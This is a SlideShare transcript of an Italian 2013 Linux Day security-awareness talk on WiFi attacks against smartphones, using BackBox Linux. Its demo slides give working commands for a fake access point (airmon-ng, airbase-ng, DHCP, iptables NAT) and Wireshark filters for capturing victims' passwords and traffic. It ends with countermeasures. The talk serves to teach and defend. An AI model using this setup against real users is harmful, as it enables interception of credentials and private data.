Your SlideShare is downloading. ×
0
Linux Day 2013 - Attacchi informatici a Smartphone e Tablet via WiFi
Linux Day 2013 - Attacchi informatici a Smartphone e Tablet via WiFi
Linux Day 2013 - Attacchi informatici a Smartphone e Tablet via WiFi
Linux Day 2013 - Attacchi informatici a Smartphone e Tablet via WiFi
Linux Day 2013 - Attacchi informatici a Smartphone e Tablet via WiFi
Linux Day 2013 - Attacchi informatici a Smartphone e Tablet via WiFi
Linux Day 2013 - Attacchi informatici a Smartphone e Tablet via WiFi
Linux Day 2013 - Attacchi informatici a Smartphone e Tablet via WiFi
Linux Day 2013 - Attacchi informatici a Smartphone e Tablet via WiFi
Linux Day 2013 - Attacchi informatici a Smartphone e Tablet via WiFi
Linux Day 2013 - Attacchi informatici a Smartphone e Tablet via WiFi
Linux Day 2013 - Attacchi informatici a Smartphone e Tablet via WiFi
Linux Day 2013 - Attacchi informatici a Smartphone e Tablet via WiFi
Linux Day 2013 - Attacchi informatici a Smartphone e Tablet via WiFi
Linux Day 2013 - Attacchi informatici a Smartphone e Tablet via WiFi
Linux Day 2013 - Attacchi informatici a Smartphone e Tablet via WiFi
Linux Day 2013 - Attacchi informatici a Smartphone e Tablet via WiFi
Linux Day 2013 - Attacchi informatici a Smartphone e Tablet via WiFi
Linux Day 2013 - Attacchi informatici a Smartphone e Tablet via WiFi
Linux Day 2013 - Attacchi informatici a Smartphone e Tablet via WiFi
Linux Day 2013 - Attacchi informatici a Smartphone e Tablet via WiFi
Linux Day 2013 - Attacchi informatici a Smartphone e Tablet via WiFi
Linux Day 2013 - Attacchi informatici a Smartphone e Tablet via WiFi
Linux Day 2013 - Attacchi informatici a Smartphone e Tablet via WiFi
Linux Day 2013 - Attacchi informatici a Smartphone e Tablet via WiFi
Linux Day 2013 - Attacchi informatici a Smartphone e Tablet via WiFi
Linux Day 2013 - Attacchi informatici a Smartphone e Tablet via WiFi
Linux Day 2013 - Attacchi informatici a Smartphone e Tablet via WiFi
Linux Day 2013 - Attacchi informatici a Smartphone e Tablet via WiFi
Linux Day 2013 - Attacchi informatici a Smartphone e Tablet via WiFi
Linux Day 2013 - Attacchi informatici a Smartphone e Tablet via WiFi
Linux Day 2013 - Attacchi informatici a Smartphone e Tablet via WiFi
Linux Day 2013 - Attacchi informatici a Smartphone e Tablet via WiFi
Upcoming SlideShare
Loading in...5
×

Thanks for flagging this SlideShare!

Oops! An error has occurred.

×
Saving this for later? Get the SlideShare app to save on your phone or tablet. Read anywhere, anytime – even offline.
Text the download link to your phone
Standard text messaging rates apply

Linux Day 2013 - Attacchi informatici a Smartphone e Tablet via WiFi

2,537

Published on

Abstract: Smartphone e Tablet trainano le vendite del settore informatico degli ultimi anni, gli utenti inconsci dei problemi di sicurezza si collegano incautamente a reti WiFi sconosciute mettendo a …

Abstract: Smartphone e Tablet trainano le vendite del settore informatico degli ultimi anni, gli utenti inconsci dei problemi di sicurezza si collegano incautamente a reti WiFi sconosciute mettendo a rischio le proprie informazioni personali. Una dimostrazione pratica permetterà di sensibilizzare l'utente medio e rivelerà ai più esperti come creare un finto Access Point con la distribuzione BackBox Linux.

More Info: http://www.oversecurity.net/2013/10/28/linux-day-2013-orvieto-diario-di-viaggio-e-slide/

Published in: Technology
0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total Views
2,537
On Slideshare
0
From Embeds
0
Number of Embeds
22
Actions
Shares
0
Downloads
28
Comments
0
Likes
0
Embeds 0
No embeds

Report content
Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
No notes for slide

Transcript

  • 1. Attacchi informatici a Smartphone e Tablet via WiFi Linux Day 26 Ottobre 2013 - Orvieto Lug BackBox Linux: attacchi informatici a Smartphone e Tablet via WiFi Andrea Draghetti
  • 2. Chi sono? • Autore • Sito • Blog • eMail • Twitter Andrea Draghetti www.andreadraghetti.it www.oversecurity.net info@andreadraghetti.it @AndreaDraghetti Linux Day 26 Ottobre 2013 - Orvieto Lug BackBox Linux: attacchi informatici a Smartphone e Tablet via WiFi Andrea Draghetti
  • 3. Agenda BackBox Linux - Distribuzione di Penetration Test ! Un caso reale: Attacco informatico a Smartphone e Tablet (ma anche computer) via WiFi Linux Day 26 Ottobre 2013 - Orvieto Lug BackBox Linux: attacchi informatici a Smartphone e Tablet via WiFi Andrea Draghetti
  • 4. BackBox Linux BackBox è una distribuzione GNU/Linux derivata da Ubuntu, progettata per eseguire Penetration Test e Vulnerability Assessment and Mitigation fornisce un insieme di strumenti che facilitano l'analisi di reti e sistemi informatici. Essa integra in un ambiente desktop completo tutti gli strumenti necessari ad un ethical hacker per eseguire vari test di sicurezza. BackBox è Open Source e Free! Linux Day 26 Ottobre 2013 - Orvieto Lug BackBox Linux: attacchi informatici a Smartphone e Tablet via WiFi Andrea Draghetti
  • 5. BackBox Screen Linux Day 26 Ottobre 2013 - Orvieto Lug BackBox Linux: attacchi informatici a Smartphone e Tablet via WiFi Andrea Draghetti
  • 6. BackBox Storia BackBox nasce nel 2010 per volontà di Raffaele Forte, da allora sono state rilasciate 10 versioni: Settembre 2010 Release Candidate Gennaio 2011 v1 Maggio 2011 v1.05 Settembre 2011 v2 Gennaio 2012 v2.01 Aprile 2012 v2.05 Ottobre 2012 v3 Gennaio 2013 v3.01 Maggio 2013 v3.05 Settembre 2013 v3.09 Linux Day 26 Ottobre 2013 - Orvieto Lug BackBox Linux: attacchi informatici a Smartphone e Tablet via WiFi Andrea Draghetti
  • 7. BackBox Programmi BackBox include oltre 70 tools, i principali: • SqlMap • Metasploit • Nmap • OpenVas • Wireshark • Aircrack-ng • John the Ripper • w3af • ... Linux Day 26 Ottobre 2013 - Orvieto Lug BackBox Linux: attacchi informatici a Smartphone e Tablet via WiFi Andrea Draghetti
  • 8. BackBox Categorie Per una migliore organizzazione tutti i programmi vengono suddivisi in categorie ! • Information Gathering • Vulnerability Assessment • Exploitation • Privilege Escalation • Maintaining Access • Documentation & Reporting • Reverse Engineering • Social Engineering • Forensic Analysis • VoIP Analysis • Wireless Analysis • Miscellaneous Linux Day 26 Ottobre 2013 - Orvieto Lug BackBox Linux: attacchi informatici a Smartphone e Tablet via WiFi Andrea Draghetti
  • 9. BackBox Statistiche BackBox è tra le 50 distribuzioni più popolari dell’ultimo anno! Linux Day 26 Ottobre 2013 - Orvieto Lug BackBox Linux: attacchi informatici a Smartphone e Tablet via WiFi Andrea Draghetti
  • 10. BackBox Link Sito ufficiale: www.backbox.org Wiki: wiki.backbox.org Forum: forum.backbox.org ! Mirror Garr: http://mirror3.mirror.garr.it/mirrors/backbox/ Mirror OS: http://backbox.oversecurity.net/downloads/ ! Repository: https://launchpad.net/~backbox Linux Day 26 Ottobre 2013 - Orvieto Lug BackBox Linux: attacchi informatici a Smartphone e Tablet via WiFi Andrea Draghetti
  • 11. Un Caso Reale Sempre più connessi... Foto: Xcelus Linux Day 26 Ottobre 2013 - Orvieto Lug BackBox Linux: attacchi informatici a Smartphone e Tablet via WiFi Andrea Draghetti
  • 12. Smartphone Fonte: Webnews Linux Day 26 Ottobre 2013 - Orvieto Lug BackBox Linux: attacchi informatici a Smartphone e Tablet via WiFi Andrea Draghetti
  • 13. Smartphone Negli ultimi anni gli smartphone stanno conquistando quote sempre maggiori del mercato della telefonia mobile, raddoppiando quasi fra il 2004 e il 2005 (più di 12 milioni di apparecchi venduti nell'ultimo anno). ! Nel secondo trimestre 2011 si è verificata in Europa una maggiore vendita di smartphone rispetto ai normali telefonini, arrivando a 21,8 milioni di unità vendute (i telefonini tradizionali arrivano a 20,4 milioni). ! Nel mondo, gli smartphone rappresentano oltre il 40% del mercato. Fonte: Wikipedia Linux Day 26 Ottobre 2013 - Orvieto Lug BackBox Linux: attacchi informatici a Smartphone e Tablet via WiFi Andrea Draghetti
  • 14. WiFi Libero Il 23 Luglio 2013 è stato definitivamente approvato l’emendamento che liberalizza le reti WiFi in Italia. ! Nessuna autenticazione e niente tracciabilità nei locali pubblici! Linux Day 26 Ottobre 2013 - Orvieto Lug BackBox Linux: attacchi informatici a Smartphone e Tablet via WiFi Andrea Draghetti
  • 15. WiFi Libero Ma all’estero il WiFi libero come viene sfruttato? Ecco i principali risultati emersi dalla ricerca condotta negli UK: • Il 46% degli intervistati che accede a internet dal proprio dispositivo mobile utilizza una rete Wi-Fi • Il 31% del campione accede almeno una volta alla settimana a servizi Wi-Fi pubblici per consultare dati aziendali confidenziali, e in media, gli intervistati si collegano 15 volte a settimana a reti Wi-Fi aperte e poco sicure • Il 52% dei pendolari teme che i propri dati possano essere intercettati durante il collegamento a una rete Wi-Fi pubblica ma, ciò nonostante, continua comunque ad utilizzarla • La metà degli intervistati vive come una frustrazione l’indisponibilità di reti Wi-Fi, a dimostrazione di come gli utenti ormai percepiscano questo servizio come indispensabile nella vita di tutti i giorni • Il 20% dei dispositivi mobili non ha sistemi di sicurezza attivati, neppure una password o un codice PIN, e solo il 5% ha adottato policy di sicurezza corporate Fonte: GFI Software™ Linux Day 26 Ottobre 2013 - Orvieto Lug BackBox Linux: attacchi informatici a Smartphone e Tablet via WiFi Andrea Draghetti
  • 16. WiFi Libero In Italia? Ho fatto una simulazione, con una Internet Key WiFi, alla Stazione Termini di Roma! SSID WiFi: “Free WiFi Termini” ! Utenti collegati contemporaneamente: 7 Utenti totali: ~16 ! Durata Test: ~1h Linux Day 26 Ottobre 2013 - Orvieto Lug BackBox Linux: attacchi informatici a Smartphone e Tablet via WiFi Andrea Draghetti
  • 17. WiFi Libero Linux Day 26 Ottobre 2013 - Orvieto Lug BackBox Linux: attacchi informatici a Smartphone e Tablet via WiFi Andrea Draghetti
  • 18. Incauto Collegamento Risultato: 16 persone in circa un ora si son collegate ad una rete WiFi sconosciuta, attratte dal plausibile nome di rete! ! 16utenti : 1h = Xutenti : 24h ! In una giornata il mio Access Point poteva raggiungere 384 utenti con un segnale che copre circa 7mt! Linux Day 26 Ottobre 2013 - Orvieto Lug BackBox Linux: attacchi informatici a Smartphone e Tablet via WiFi Andrea Draghetti
  • 19. Hacking Se le mie intenzioni non fossero state pacifiche? Cosa potevo ottenere da 384 utenti? Sfruttando un Access Point più potente/professionale? Linux Day 26 Ottobre 2013 - Orvieto Lug BackBox Linux: attacchi informatici a Smartphone e Tablet via WiFi Andrea Draghetti
  • 20. Fake AP Creando un finto Access Point garantisco agli utenti di collegarsi ad internet e senza che loro si accorgano di nulla posso intercettare/sniffare tutto il traffico che generano. ! ! ! ! ! Otterrò: Cronologia di navigazione, eMail, Ricerche, Password, ecc Linux Day 26 Ottobre 2013 - Orvieto Lug BackBox Linux: attacchi informatici a Smartphone e Tablet via WiFi Andrea Draghetti
  • 21. Dimostrazione Non ci credete? Proviamo assieme! Occorrente: • BackBox Linux • Collegamento a Internet • Adattatore WiFi USB • Server DHCP • Tanta volontà... :) Linux Day 26 Ottobre 2013 - Orvieto Lug BackBox Linux: attacchi informatici a Smartphone e Tablet via WiFi Andrea Draghetti
  • 22. DHCP Server $ sudo -s $ apt-get update && apt-get install dhcp3-server $ gedit /etc/dhcpd.conf ddns-update-style ad-hoc; default-lease-time 600; max-lease-time 7200; subnet 192.168.2.0 netmask 255.255.255.0 { option subnet-mask 255.255.255.0; option broadcast-address 192.168.2.255; option routers 192.168.2.1; option domain-name-servers 208.67.222.222; #OpenDNS range 192.168.2.2 192.168.2.254; } Linux Day 26 Ottobre 2013 - Orvieto Lug BackBox Linux: attacchi informatici a Smartphone e Tablet via WiFi Andrea Draghetti
  • 23. Monitor Mode $ sudo -s $ airmon-ng start wlan0 wlan0 è l’attuale interfaccia di rete, se non conoscente la vostra interfaccia di rete wireless digitare il comando: iwconfig Linux Day 26 Ottobre 2013 - Orvieto Lug BackBox Linux: attacchi informatici a Smartphone e Tablet via WiFi Andrea Draghetti
  • 24. Fake AP $ sudo -s $ airbase-ng --essid FakeAP -v mon0 mon0 è interfaccia di rete creata nel passo precedente, ovvero con la funzione di Monitor Mode. Se non ricordate l’interfaccia di rete creata digitare il comando: iwconfig Linux Day 26 Ottobre 2013 - Orvieto Lug BackBox Linux: attacchi informatici a Smartphone e Tablet via WiFi Andrea Draghetti
  • 25. NetMask e Subnet (apriamo un nuovo terminale) $ sudo -s $ ifconfig at0 up $ ifconfig at0 192.168.2.1 netmask 255.255.255.0 $ route add -net 192.168.2.0 netmask 255.255.255.0 gw 192.168.2.1 at0 è interfaccia di rete creata nel passo precedente, ovvero con la funzione di Fake AP. Se non ricordate l’interfaccia di rete creata digitare il comando: iwconfig Linux Day 26 Ottobre 2013 - Orvieto Lug BackBox Linux: attacchi informatici a Smartphone e Tablet via WiFi Andrea Draghetti
  • 26. Start DHCP Server $ sudo -s $ touch /var/run/dhcpd.pid $ chmod 777 /var/run/dhcpd.pid $ dhcpd -d -f -cf /etc/dhcpd.conf at0 at0 è interfaccia di rete creata con la procedura di Fake AP. Se non ricordate l’interfaccia di rete creata digitare il comando: iwconfig Linux Day 26 Ottobre 2013 - Orvieto Lug BackBox Linux: attacchi informatici a Smartphone e Tablet via WiFi Andrea Draghetti
  • 27. IpTables (apriamo un nuovo terminale) $ sudo -s $ iptables --flush $ iptables --table nat --flush $ iptables --delete-chain $ iptables --table nat --delete-chain $ echo 1 > /proc/sys/net/ipv4/ip_forward $ iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE $ iptables --append FORWARD --in-interface at0 -j ACCEPT $ iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to 192.168.1.1 eth0 è l’interfaccia di rete realmente collegata ad internet at0 è l’interfaccia del Fake AP 192.168.1.1 è il reale gateway, se non lo conoscete digitate il comando: route -n Linux Day 26 Ottobre 2013 - Orvieto Lug BackBox Linux: attacchi informatici a Smartphone e Tablet via WiFi Andrea Draghetti
  • 28. WireShark $ sudo -s $ wireshark ! Visionare l'interfaccia at0 ! Filtri consigliati: tcp contains XXX Cerca la parola XXX in tutti i pacchetti TCP http.request Visualizza tutto il traffico GET e POST http Visualizza tutto il traffico HTTP ssl • • • • Linux Day 26 Ottobre 2013 - Orvieto Lug BackBox Linux: attacchi informatici a Smartphone e Tablet via WiFi Andrea Draghetti
  • 29. Contromisure La prima regola è DIFFIDATE, sfruttate la vostra offerta Internet! Ma a volte è indispensabile collegarsi ad un Access Point sconosciuto, possiamo proteggerci? Linux Day 26 Ottobre 2013 - Orvieto Lug BackBox Linux: attacchi informatici a Smartphone e Tablet via WiFi Andrea Draghetti
  • 30. VPN Una Virtual Private Network permette di collegare in modo sicuro due estremi di una connessione tramite una rete non dedicata, tipicamente utilizzando internet. Si può vedere una VPN come l'estensione su scala geografica di una rete locale privata che collega tra loro terminali dislocati su tutto il territorio sfruttando una rete IP pubblica e realizzando una rete LAN, detta appunto virtuale e privata, logicamente del tutto equivalente ad una infrastruttura fisica di rete appositamente dedicata. Linux Day 26 Ottobre 2013 - Orvieto Lug BackBox Linux: attacchi informatici a Smartphone e Tablet via WiFi Andrea Draghetti
  • 31. Server VPN? È possibile crearsi un proprio Server VPN: ! Sfruttando DD-WRT, firmware Open Source per il vostro Router, se è compatibile. ! Implementando pfSense, firewall/router software open source basato su FreeBSD, configurabile su un comune computer. Linux Day 26 Ottobre 2013 - Orvieto Lug BackBox Linux: attacchi informatici a Smartphone e Tablet via WiFi Andrea Draghetti
  • 32. Contromisura Estrema Black Hole Data Bag isola il proprio dispositivo da qualsiasi segnale 2G, 3G o 4G oltre ai segnali WiFi, Bluetooth e NFC! ! La vostra privacy è assicurata! Fonte: D3Lab Linux Day 26 Ottobre 2013 - Orvieto Lug BackBox Linux: attacchi informatici a Smartphone e Tablet via WiFi Andrea Draghetti
  • 33. Domande ? Linux Day 26 Ottobre 2013 - Orvieto Lug BackBox Linux: attacchi informatici a Smartphone e Tablet via WiFi Andrea Draghetti

×